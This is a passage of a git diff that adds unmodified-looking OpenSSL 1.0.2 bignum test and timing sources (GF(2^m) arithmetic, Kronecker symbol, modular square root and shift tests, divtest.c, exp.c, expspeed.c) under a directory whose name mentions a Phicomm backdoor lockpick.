+ err:
+    BN_free(a);
+    BN_free(b[0]);
+    BN_free(b[1]);
+    BN_free(c);
+    BN_free(d);
+    BN_free(e);
+    BN_free(f);
+    BN_free(g);
+    BN_free(h);
+    return ret;
+}
+
+int test_gf2m_mod_sqr(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *b[2], *c, *d;
+    int i, j, ret = 0;
+    int p0[] = { 163, 7, 6, 3, 0, -1 };
+    int p1[] = { 193, 15, 0, -1 };
+
+    a = BN_new();
+    b[0] = BN_new();
+    b[1] = BN_new();
+    c = BN_new();
+    d = BN_new();
+
+    BN_GF2m_arr2poly(p0, b[0]);
+    BN_GF2m_arr2poly(p1, b[1]);
+
+    for (i = 0; i < num0; i++) {
+        BN_bntest_rand(a, 1024, 0, 0);
+        for (j = 0; j < 2; j++) {
+            BN_GF2m_mod_sqr(c, a, b[j], ctx);
+            BN_copy(d, a);
+            BN_GF2m_mod_mul(d, a, d, b[j], ctx);
+# if 0                          /* make test uses ouput in bc but bc can't
+                                 * handle GF(2^m) arithmetic */
+            if (bp != NULL) {
+                if (!results) {
+                    BN_print(bp, a);
+                    BIO_puts(bp, " ^ 2 % ");
+                    BN_print(bp, b[j]);
+                    BIO_puts(bp, " = ");
+                    BN_print(bp, c);
+                    BIO_puts(bp, "; a * a = ");
+                    BN_print(bp, d);
+                    BIO_puts(bp, "\n");
+                }
+            }
+# endif
+            BN_GF2m_add(d, c, d);
+            /* Test that a*a = a^2. */
+            if (!BN_is_zero(d)) {
+                fprintf(stderr, "GF(2^m) modular squaring test failed!\n");
+                goto err;
+            }
+        }
+    }
+    ret = 1;
+ err:
+    BN_free(a);
+    BN_free(b[0]);
+    BN_free(b[1]);
+    BN_free(c);
+    BN_free(d);
+    return ret;
+}
+
+int test_gf2m_mod_inv(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *b[2], *c, *d;
+    int i, j, ret = 0;
+    int p0[] = { 163, 7, 6, 3, 0, -1 };
+    int p1[] = { 193, 15, 0, -1 };
+
+    a = BN_new();
+    b[0] = BN_new();
+    b[1] = BN_new();
+    c = BN_new();
+    d = BN_new();
+
+    BN_GF2m_arr2poly(p0, b[0]);
+    BN_GF2m_arr2poly(p1, b[1]);
+
+    for (i = 0; i < num0; i++) {
+        BN_bntest_rand(a, 512, 0, 0);
+        for (j = 0; j < 2; j++) {
+            BN_GF2m_mod_inv(c, a, b[j], ctx);
+            BN_GF2m_mod_mul(d, a, c, b[j], ctx);
+# if 0                          /* make test uses ouput in bc but bc can't
+                                 * handle GF(2^m) arithmetic */
+            if (bp != NULL) {
+                if (!results) {
+                    BN_print(bp, a);
+                    BIO_puts(bp, " * ");
+                    BN_print(bp, c);
+                    BIO_puts(bp, " - 1 % ");
+                    BN_print(bp, b[j]);
+                    BIO_puts(bp, "\n");
+                }
+            }
+# endif
+            /* Test that ((1/a)*a) = 1. */
+            if (!BN_is_one(d)) {
+                fprintf(stderr, "GF(2^m) modular inversion test failed!\n");
+                goto err;
+            }
+        }
+    }
+    ret = 1;
+ err:
+    BN_free(a);
+    BN_free(b[0]);
+    BN_free(b[1]);
+    BN_free(c);
+    BN_free(d);
+    return ret;
+}
+
+int test_gf2m_mod_div(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *b[2], *c, *d, *e, *f;
+    int i, j, ret = 0;
+    int p0[] = { 163, 7, 6, 3, 0, -1 };
+    int p1[] = { 193, 15, 0, -1 };
+
+    a = BN_new();
+    b[0] = BN_new();
+    b[1] = BN_new();
+    c = BN_new();
+    d = BN_new();
+    e = BN_new();
+    f = BN_new();
+
+    BN_GF2m_arr2poly(p0, b[0]);
+    BN_GF2m_arr2poly(p1, b[1]);
+
+    for (i = 0; i < num0; i++) {
+        BN_bntest_rand(a, 512, 0, 0);
+        BN_bntest_rand(c, 512, 0, 0);
+        for (j = 0; j < 2; j++) {
+            BN_GF2m_mod_div(d, a, c, b[j], ctx);
+            BN_GF2m_mod_mul(e, d, c, b[j], ctx);
+            BN_GF2m_mod_div(f, a, e, b[j], ctx);
+# if 0                          /* make test uses ouput in bc but bc can't
+                                 * handle GF(2^m) arithmetic */
+            if (bp != NULL) {
+                if (!results) {
+                    BN_print(bp, a);
+                    BIO_puts(bp, " = ");
+                    BN_print(bp, c);
+                    BIO_puts(bp, " * ");
+                    BN_print(bp, d);
+                    BIO_puts(bp, " % ");
+                    BN_print(bp, b[j]);
+                    BIO_puts(bp, "\n");
+                }
+            }
+# endif
+            /* Test that ((a/c)*c)/a = 1. */
+            if (!BN_is_one(f)) {
+                fprintf(stderr, "GF(2^m) modular division test failed!\n");
+                goto err;
+            }
+        }
+    }
+    ret = 1;
+ err:
+    BN_free(a);
+    BN_free(b[0]);
+    BN_free(b[1]);
+    BN_free(c);
+    BN_free(d);
+    BN_free(e);
+    BN_free(f);
+    return ret;
+}
+
+int test_gf2m_mod_exp(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *b[2], *c, *d, *e, *f;
+    int i, j, ret = 0;
+    int p0[] = { 163, 7, 6, 3, 0, -1 };
+    int p1[] = { 193, 15, 0, -1 };
+
+    a = BN_new();
+    b[0] = BN_new();
+    b[1] = BN_new();
+    c = BN_new();
+    d = BN_new();
+    e = BN_new();
+    f = BN_new();
+
+    BN_GF2m_arr2poly(p0, b[0]);
+    BN_GF2m_arr2poly(p1, b[1]);
+
+    for (i = 0; i < num0; i++) {
+        BN_bntest_rand(a, 512, 0, 0);
+        BN_bntest_rand(c, 512, 0, 0);
+        BN_bntest_rand(d, 512, 0, 0);
+        for (j = 0; j < 2; j++) {
+            BN_GF2m_mod_exp(e, a, c, b[j], ctx);
+            BN_GF2m_mod_exp(f, a, d, b[j], ctx);
+            BN_GF2m_mod_mul(e, e, f, b[j], ctx);
+            BN_add(f, c, d);
+            BN_GF2m_mod_exp(f, a, f, b[j], ctx);
+# if 0                          /* make test uses ouput in bc but bc can't
+                                 * handle GF(2^m) arithmetic */
+            if (bp != NULL) {
+                if (!results) {
+                    BN_print(bp, a);
+                    BIO_puts(bp, " ^ (");
+                    BN_print(bp, c);
+                    BIO_puts(bp, " + ");
+                    BN_print(bp, d);
+                    BIO_puts(bp, ") = ");
+                    BN_print(bp, e);
+                    BIO_puts(bp, "; - ");
+                    BN_print(bp, f);
+                    BIO_puts(bp, " % ");
+                    BN_print(bp, b[j]);
+                    BIO_puts(bp, "\n");
+                }
+            }
+# endif
+            BN_GF2m_add(f, e, f);
+            /* Test that a^(c+d)=a^c*a^d. */
+            if (!BN_is_zero(f)) {
+                fprintf(stderr,
+                        "GF(2^m) modular exponentiation test failed!\n");
+                goto err;
+            }
+        }
+    }
+    ret = 1;
+ err:
+    BN_free(a);
+    BN_free(b[0]);
+    BN_free(b[1]);
+    BN_free(c);
+    BN_free(d);
+    BN_free(e);
+    BN_free(f);
+    return ret;
+}
+
+int test_gf2m_mod_sqrt(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *b[2], *c, *d, *e, *f;
+    int i, j, ret = 0;
+    int p0[] = { 163, 7, 6, 3, 0, -1 };
+    int p1[] = { 193, 15, 0, -1 };
+
+    a = BN_new();
+    b[0] = BN_new();
+    b[1] = BN_new();
+    c = BN_new();
+    d = BN_new();
+    e = BN_new();
+    f = BN_new();
+
+    BN_GF2m_arr2poly(p0, b[0]);
+    BN_GF2m_arr2poly(p1, b[1]);
+
+    for (i = 0; i < num0; i++) {
+        BN_bntest_rand(a, 512, 0, 0);
+        for (j = 0; j < 2; j++) {
+            BN_GF2m_mod(c, a, b[j]);
+            BN_GF2m_mod_sqrt(d, a, b[j], ctx);
+            BN_GF2m_mod_sqr(e, d, b[j], ctx);
+# if 0                          /* make test uses ouput in bc but bc can't
+                                 * handle GF(2^m) arithmetic */
+            if (bp != NULL) {
+                if (!results) {
+                    BN_print(bp, d);
+                    BIO_puts(bp, " ^ 2 - ");
+                    BN_print(bp, a);
+                    BIO_puts(bp, "\n");
+                }
+            }
+# endif
+            BN_GF2m_add(f, c, e);
+            /* Test that d^2 = a, where d = sqrt(a). */
+            if (!BN_is_zero(f)) {
+                fprintf(stderr, "GF(2^m) modular square root test failed!\n");
+                goto err;
+            }
+        }
+    }
+    ret = 1;
+ err:
+    BN_free(a);
+    BN_free(b[0]);
+    BN_free(b[1]);
+    BN_free(c);
+    BN_free(d);
+    BN_free(e);
+    BN_free(f);
+    return ret;
+}
+
+int test_gf2m_mod_solve_quad(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *b[2], *c, *d, *e;
+    int i, j, s = 0, t, ret = 0;
+    int p0[] = { 163, 7, 6, 3, 0, -1 };
+    int p1[] = { 193, 15, 0, -1 };
+
+    a = BN_new();
+    b[0] = BN_new();
+    b[1] = BN_new();
+    c = BN_new();
+    d = BN_new();
+    e = BN_new();
+
+    BN_GF2m_arr2poly(p0, b[0]);
+    BN_GF2m_arr2poly(p1, b[1]);
+
+    for (i = 0; i < num0; i++) {
+        BN_bntest_rand(a, 512, 0, 0);
+        for (j = 0; j < 2; j++) {
+            t = BN_GF2m_mod_solve_quad(c, a, b[j], ctx);
+            if (t) {
+                s++;
+                BN_GF2m_mod_sqr(d, c, b[j], ctx);
+                BN_GF2m_add(d, c, d);
+                BN_GF2m_mod(e, a, b[j]);
+# if 0                          /* make test uses ouput in bc but bc can't
+                                 * handle GF(2^m) arithmetic */
+                if (bp != NULL) {
+                    if (!results) {
+                        BN_print(bp, c);
+                        BIO_puts(bp, " is root of z^2 + z = ");
+                        BN_print(bp, a);
+                        BIO_puts(bp, " % ");
+                        BN_print(bp, b[j]);
+                        BIO_puts(bp, "\n");
+                    }
+                }
+# endif
+                BN_GF2m_add(e, e, d);
+                /*
+                 * Test that solution of quadratic c satisfies c^2 + c = a.
+                 */
+                if (!BN_is_zero(e)) {
+                    fprintf(stderr,
+                            "GF(2^m) modular solve quadratic test failed!\n");
+                    goto err;
+                }
+
+            } else {
+# if 0                          /* make test uses ouput in bc but bc can't
+                                 * handle GF(2^m) arithmetic */
+                if (bp != NULL) {
+                    if (!results) {
+                        BIO_puts(bp, "There are no roots of z^2 + z = ");
+                        BN_print(bp, a);
+                        BIO_puts(bp, " % ");
+                        BN_print(bp, b[j]);
+                        BIO_puts(bp, "\n");
+                    }
+                }
+# endif
+            }
+        }
+    }
+    if (s == 0) {
+        fprintf(stderr,
+                "All %i tests of GF(2^m) modular solve quadratic resulted in no roots;\n",
+                num0);
+        fprintf(stderr,
+                "this is very unlikely and probably indicates an error.\n");
+        goto err;
+    }
+    ret = 1;
+ err:
+    BN_free(a);
+    BN_free(b[0]);
+    BN_free(b[1]);
+    BN_free(c);
+    BN_free(d);
+    BN_free(e);
+    return ret;
+}
+#endif
+static int genprime_cb(int p, int n, BN_GENCB *arg)
+{
+    char c = '*';
+
+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    putc(c, stderr);
+    fflush(stderr);
+    return 1;
+}
+
+int test_kron(BIO *bp, BN_CTX *ctx)
+{
+    BN_GENCB cb;
+    BIGNUM *a, *b, *r, *t;
+    int i;
+    int legendre, kronecker;
+    int ret = 0;
+
+    a = BN_new();
+    b = BN_new();
+    r = BN_new();
+    t = BN_new();
+    if (a == NULL || b == NULL || r == NULL || t == NULL)
+        goto err;
+
+    BN_GENCB_set(&cb, genprime_cb, NULL);
+
+    /*
+     * We test BN_kronecker(a, b, ctx) just for b odd (Jacobi symbol). In
+     * this case we know that if b is prime, then BN_kronecker(a, b, ctx) is
+     * congruent to $a^{(b-1)/2}$, modulo $b$ (Legendre symbol). So we
+     * generate a random prime b and compare these values for a number of
+     * random a's.  (That is, we run the Solovay-Strassen primality test to
+     * confirm that b is prime, except that we don't want to test whether b
+     * is prime but whether BN_kronecker works.)
+     */
+
+    if (!BN_generate_prime_ex(b, 512, 0, NULL, NULL, &cb))
+        goto err;
+    b->neg = rand_neg();
+    putc('\n', stderr);
+
+    for (i = 0; i < num0; i++) {
+        if (!BN_bntest_rand(a, 512, 0, 0))
+            goto err;
+        a->neg = rand_neg();
+
+        /* t := (|b|-1)/2  (note that b is odd) */
+        if (!BN_copy(t, b))
+            goto err;
+        t->neg = 0;
+        if (!BN_sub_word(t, 1))
+            goto err;
+        if (!BN_rshift1(t, t))
+            goto err;
+        /* r := a^t mod b */
+        b->neg = 0;
+
+        if (!BN_mod_exp_recp(r, a, t, b, ctx))
+            goto err;
+        b->neg = 1;
+
+        if (BN_is_word(r, 1))
+            legendre = 1;
+        else if (BN_is_zero(r))
+            legendre = 0;
+        else {
+            if (!BN_add_word(r, 1))
+                goto err;
+            if (0 != BN_ucmp(r, b)) {
+                fprintf(stderr, "Legendre symbol computation failed\n");
+                goto err;
+            }
+            legendre = -1;
+        }
+
+        kronecker = BN_kronecker(a, b, ctx);
+        if (kronecker < -1)
+            goto err;
+        /* we actually need BN_kronecker(a, |b|) */
+        if (a->neg && b->neg)
+            kronecker = -kronecker;
+
+        if (legendre != kronecker) {
+            fprintf(stderr, "legendre != kronecker; a = ");
+            BN_print_fp(stderr, a);
+            fprintf(stderr, ", b = ");
+            BN_print_fp(stderr, b);
+            fprintf(stderr, "\n");
+            goto err;
+        }
+
+        putc('.', stderr);
+        fflush(stderr);
+    }
+
+    putc('\n', stderr);
+    fflush(stderr);
+    ret = 1;
+ err:
+    if (a != NULL)
+        BN_free(a);
+    if (b != NULL)
+        BN_free(b);
+    if (r != NULL)
+        BN_free(r);
+    if (t != NULL)
+        BN_free(t);
+    return ret;
+}
+
+int test_sqrt(BIO *bp, BN_CTX *ctx)
+{
+    BN_GENCB cb;
+    BIGNUM *a, *p, *r;
+    int i, j;
+    int ret = 0;
+
+    a = BN_new();
+    p = BN_new();
+    r = BN_new();
+    if (a == NULL || p == NULL || r == NULL)
+        goto err;
+
+    BN_GENCB_set(&cb, genprime_cb, NULL);
+
+    for (i = 0; i < 16; i++) {
+        if (i < 8) {
+            unsigned primes[8] = { 2, 3, 5, 7, 11, 13, 17, 19 };
+
+            if (!BN_set_word(p, primes[i]))
+                goto err;
+        } else {
+            if (!BN_set_word(a, 32))
+                goto err;
+            if (!BN_set_word(r, 2 * i + 1))
+                goto err;
+
+            if (!BN_generate_prime_ex(p, 256, 0, a, r, &cb))
+                goto err;
+            putc('\n', stderr);
+        }
+        p->neg = rand_neg();
+
+        for (j = 0; j < num2; j++) {
+            /*
+             * construct 'a' such that it is a square modulo p, but in
+             * general not a proper square and not reduced modulo p
+             */
+            if (!BN_bntest_rand(r, 256, 0, 3))
+                goto err;
+            if (!BN_nnmod(r, r, p, ctx))
+                goto err;
+            if (!BN_mod_sqr(r, r, p, ctx))
+                goto err;
+            if (!BN_bntest_rand(a, 256, 0, 3))
+                goto err;
+            if (!BN_nnmod(a, a, p, ctx))
+                goto err;
+            if (!BN_mod_sqr(a, a, p, ctx))
+                goto err;
+            if (!BN_mul(a, a, r, ctx))
+                goto err;
+            if (rand_neg())
+                if (!BN_sub(a, a, p))
+                    goto err;
+
+            if (!BN_mod_sqrt(r, a, p, ctx))
+                goto err;
+            if (!BN_mod_sqr(r, r, p, ctx))
+                goto err;
+
+            if (!BN_nnmod(a, a, p, ctx))
+                goto err;
+
+            if (BN_cmp(a, r) != 0) {
+                fprintf(stderr, "BN_mod_sqrt failed: a = ");
+                BN_print_fp(stderr, a);
+                fprintf(stderr, ", r = ");
+                BN_print_fp(stderr, r);
+                fprintf(stderr, ", p = ");
+                BN_print_fp(stderr, p);
+                fprintf(stderr, "\n");
+                goto err;
+            }
+
+            putc('.', stderr);
+            fflush(stderr);
+        }
+
+        putc('\n', stderr);
+        fflush(stderr);
+    }
+    ret = 1;
+ err:
+    if (a != NULL)
+        BN_free(a);
+    if (p != NULL)
+        BN_free(p);
+    if (r != NULL)
+        BN_free(r);
+    return ret;
+}
+
+int test_lshift(BIO *bp, BN_CTX *ctx, BIGNUM *a_)
+{
+    BIGNUM *a, *b, *c, *d;
+    int i;
+
+    b = BN_new();
+    c = BN_new();
+    d = BN_new();
+    BN_one(c);
+
+    if (a_)
+        a = a_;
+    else {
+        a = BN_new();
+        BN_bntest_rand(a, 200, 0, 0);
+        a->neg = rand_neg();
+    }
+    for (i = 0; i < num0; i++) {
+        BN_lshift(b, a, i + 1);
+        BN_add(c, c, c);
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, a);
+                BIO_puts(bp, " * ");
+                BN_print(bp, c);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, b);
+            BIO_puts(bp, "\n");
+        }
+        BN_mul(d, a, c, ctx);
+        BN_sub(d, d, b);
+        if (!BN_is_zero(d)) {
+            fprintf(stderr, "Left shift test failed!\n");
+            fprintf(stderr, "a=");
+            BN_print_fp(stderr, a);
+            fprintf(stderr, "\nb=");
+            BN_print_fp(stderr, b);
+            fprintf(stderr, "\nc=");
+            BN_print_fp(stderr, c);
+            fprintf(stderr, "\nd=");
+            BN_print_fp(stderr, d);
+            fprintf(stderr, "\n");
+            return 0;
+        }
+    }
+    BN_free(a);
+    BN_free(b);
+    BN_free(c);
+    BN_free(d);
+    return (1);
+}
+
+int test_lshift1(BIO *bp)
+{
+    BIGNUM *a, *b, *c;
+    int i;
+
+    a = BN_new();
+    b = BN_new();
+    c = BN_new();
+
+    BN_bntest_rand(a, 200, 0, 0);
+    a->neg = rand_neg();
+    for (i = 0; i < num0; i++) {
+        BN_lshift1(b, a);
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, a);
+                BIO_puts(bp, " * 2");
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, b);
+            BIO_puts(bp, "\n");
+        }
+        BN_add(c, a, a);
+        BN_sub(a, b, c);
+        if (!BN_is_zero(a)) {
+            fprintf(stderr, "Left shift one test failed!\n");
+            return 0;
+        }
+
+        BN_copy(a, b);
+    }
+    BN_free(a);
+    BN_free(b);
+    BN_free(c);
+    return (1);
+}
+
+int test_rshift(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *b, *c, *d, *e;
+    int i;
+
+    a = BN_new();
+    b = BN_new();
+    c = BN_new();
+    d = BN_new();
+    e = BN_new();
+    BN_one(c);
+
+    BN_bntest_rand(a, 200, 0, 0);
+    a->neg = rand_neg();
+    for (i = 0; i < num0; i++) {
+        BN_rshift(b, a, i + 1);
+        BN_add(c, c, c);
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, a);
+                BIO_puts(bp, " / ");
+                BN_print(bp, c);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, b);
+            BIO_puts(bp, "\n");
+        }
+        BN_div(d, e, a, c, ctx);
+        BN_sub(d, d, b);
+        if (!BN_is_zero(d)) {
+            fprintf(stderr, "Right shift test failed!\n");
+            return 0;
+        }
+    }
+    BN_free(a);
+    BN_free(b);
+    BN_free(c);
+    BN_free(d);
+    BN_free(e);
+    return (1);
+}
+
+int test_rshift1(BIO *bp)
+{
+    BIGNUM *a, *b, *c;
+    int i;
+
+    a = BN_new();
+    b = BN_new();
+    c = BN_new();
+
+    BN_bntest_rand(a, 200, 0, 0);
+    a->neg = rand_neg();
+    for (i = 0; i < num0; i++) {
+        BN_rshift1(b, a);
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, a);
+                BIO_puts(bp, " / 2");
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, b);
+            BIO_puts(bp, "\n");
+        }
+        BN_sub(c, a, b);
+        BN_sub(c, c, b);
+        if (!BN_is_zero(c) && !BN_abs_is_word(c, 1)) {
+            fprintf(stderr, "Right shift one test failed!\n");
+            return 0;
+        }
+        BN_copy(a, b);
+    }
+    BN_free(a);
+    BN_free(b);
+    BN_free(c);
+    return (1);
+}
+
+int rand_neg(void)
+{
+    static unsigned int neg = 0;
+    static int sign[8] = { 0, 0, 0, 1, 1, 0, 1, 1 };
+
+    return (sign[(neg++) % 8]);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/divtest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/divtest.c
new file mode 100644
index 0000000..2590b45
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/divtest.c
@@ -0,0 +1,42 @@
+#include <openssl/bn.h>
+#include <openssl/rand.h>
+
+static int Rand(n)
+{
+    unsigned char x[2];
+    RAND_pseudo_bytes(x, 2);
+    return (x[0] + 2 * x[1]);
+}
+
+static void bug(char *m, BIGNUM *a, BIGNUM *b)
+{
+    printf("%s!\na=", m);
+    BN_print_fp(stdout, a);
+    printf("\nb=");
+    BN_print_fp(stdout, b);
+    printf("\n");
+    fflush(stdout);
+}
+
+main()
+{
+    BIGNUM *a = BN_new(), *b = BN_new(), *c = BN_new(), *d = BN_new(),
+        *C = BN_new(), *D = BN_new();
+    BN_RECP_CTX *recp = BN_RECP_CTX_new();
+    BN_CTX *ctx = BN_CTX_new();
+
+    for (;;) {
+        BN_pseudo_rand(a, Rand(), 0, 0);
+        BN_pseudo_rand(b, Rand(), 0, 0);
+        if (BN_is_zero(b))
+            continue;
+
+        BN_RECP_CTX_set(recp, b, ctx);
+        if (BN_div(C, D, a, b, ctx) != 1)
+            bug("BN_div failed", a, b);
+        if (BN_div_recp(c, d, a, recp, ctx) != 1)
+            bug("BN_div_recp failed", a, b);
+        else if (BN_cmp(c, C) != 0 || BN_cmp(c, C) != 0)
+            bug("mismatch", a, b);
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/exp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/exp.c
new file mode 100644
index 0000000..fbce28c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/exp.c
@@ -0,0 +1,61 @@
+/* unused */
+
+#include <stdio.h>
+#include <openssl/tmdiff.h>
+#include "bn_lcl.h"
+
+#define SIZE    256
+#define NUM     (8*8*8)
+#define MOD     (8*8*8*8*8)
+
+main(argc, argv)
+int argc;
+char *argv[];
+{
+    BN_CTX ctx;
+    BIGNUM a, b, c, r, rr, t, l;
+    int j, i, size = SIZE, num = NUM, mod = MOD;
+    char *start, *end;
+    BN_MONT_CTX mont;
+    double d, md;
+
+    BN_MONT_CTX_init(&mont);
+    BN_CTX_init(&ctx);
+    BN_init(&a);
+    BN_init(&b);
+    BN_init(&c);
+    BN_init(&r);
+
+    start = ms_time_new();
+    end = ms_time_new();
+    while (size <= 1024 * 8) {
+        BN_rand(&a, size, 0, 0);
+        BN_rand(&b, size, 1, 0);
+        BN_rand(&c, size, 0, 1);
+
+        BN_mod(&a, &a, &c, &ctx);
+
+        ms_time_get(start);
+        for (i = 0; i < 10; i++)
+            BN_MONT_CTX_set(&mont, &c, &ctx);
+        ms_time_get(end);
+        md = ms_time_diff(start, end);
+
+        ms_time_get(start);
+        for (i = 0; i < num; i++) {
+            /* bn_mull(&r,&a,&b,&ctx); */
+            /* BN_sqr(&r,&a,&ctx); */
+            BN_mod_exp_mont(&r, &a, &b, &c, &ctx, &mont);
+        }
+        ms_time_get(end);
+        d = ms_time_diff(start, end) /* *50/33 */ ;
+        printf("%5d bit:%6.2f %6d %6.4f %4d m_set(%5.4f)\n", size,
+               d, num, d / num, (int)((d / num) * mod), md / 10.0);
+        num /= 8;
+        mod /= 8;
+        if (num <= 0)
+            num = 1;
+        size *= 2;
+    }
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/expspeed.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/expspeed.c
new file mode 100644
index 0000000..513a568
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/expspeed.c
@@ -0,0 +1,381 @@
+/* unused */
+
+/* crypto/bn/expspeed.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* most of this code has been pilfered from my libdes speed.c program */
+
+#define BASENUM 5000
+#define NUM_START 0
+
+/*
+ * determine timings for modexp, modmul, modsqr, gcd, Kronecker symbol,
+ * modular inverse, or modular square roots
+ */
+#define TEST_EXP
+#undef TEST_MUL
+#undef TEST_SQR
+#undef TEST_GCD
+#undef TEST_KRON
+#undef TEST_INV
+#undef TEST_SQRT
+#define P_MOD_64 9              /* least significant 6 bits for prime to be
+                                 * used for BN_sqrt timings */
+
+#if defined(TEST_EXP) + defined(TEST_MUL) + defined(TEST_SQR) + defined(TEST_GCD) + defined(TEST_KRON) + defined(TEST_INV) +defined(TEST_SQRT) != 1
+# error "choose one test"
+#endif
+
+#if defined(TEST_INV) || defined(TEST_SQRT)
+# define C_PRIME
+static void genprime_cb(int p, int n, void *arg);
+#endif
+
+#undef PROG
+#define PROG bnspeed_main
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/err.h>
+#include <openssl/rand.h>
+
+#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC)) && !defined(OPENSSL_SYS_MACOSX)
+# define TIMES
+#endif
+
+#ifndef _IRIX
+# include <time.h>
+#endif
+#ifdef TIMES
+# include <sys/types.h>
+# include <sys/times.h>
+#endif
+
+/*
+ * Depending on the VMS version, the tms structure is perhaps defined. The
+ * __TMS macro will show if it was.  If it wasn't defined, we should undefine
+ * TIMES, since that tells the rest of the program how things should be
+ * handled.  -- Richard Levitte
+ */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
+# undef TIMES
+#endif
+
+#ifndef TIMES
+# include <sys/timeb.h>
+#endif
+
+#if defined(sun) || defined(__ultrix)
+# define _POSIX_SOURCE
+# include <limits.h>
+# include <sys/param.h>
+#endif
+
+#include <openssl/bn.h>
+#include <openssl/x509.h>
+
+/* The following if from times(3) man page.  It may need to be changed */
+#ifndef HZ
+# ifndef CLK_TCK
+#  ifndef _BSD_CLK_TCK_         /* FreeBSD hack */
+#   define HZ   100.0
+#  else                         /* _BSD_CLK_TCK_ */
+#   define HZ ((double)_BSD_CLK_TCK_)
+#  endif
+# else                          /* CLK_TCK */
+#  define HZ ((double)CLK_TCK)
+# endif
+#endif
+
+#undef BUFSIZE
+#define BUFSIZE ((long)1024*8)
+int run = 0;
+
+static double Time_F(int s);
+#define START   0
+#define STOP    1
+
+static double Time_F(int s)
+{
+    double ret;
+#ifdef TIMES
+    static struct tms tstart, tend;
+
+    if (s == START) {
+        times(&tstart);
+        return (0);
+    } else {
+        times(&tend);
+        ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
+        return ((ret < 1e-3) ? 1e-3 : ret);
+    }
+#else                           /* !times() */
+    static struct timeb tstart, tend;
+    long i;
+
+    if (s == START) {
+        ftime(&tstart);
+        return (0);
+    } else {
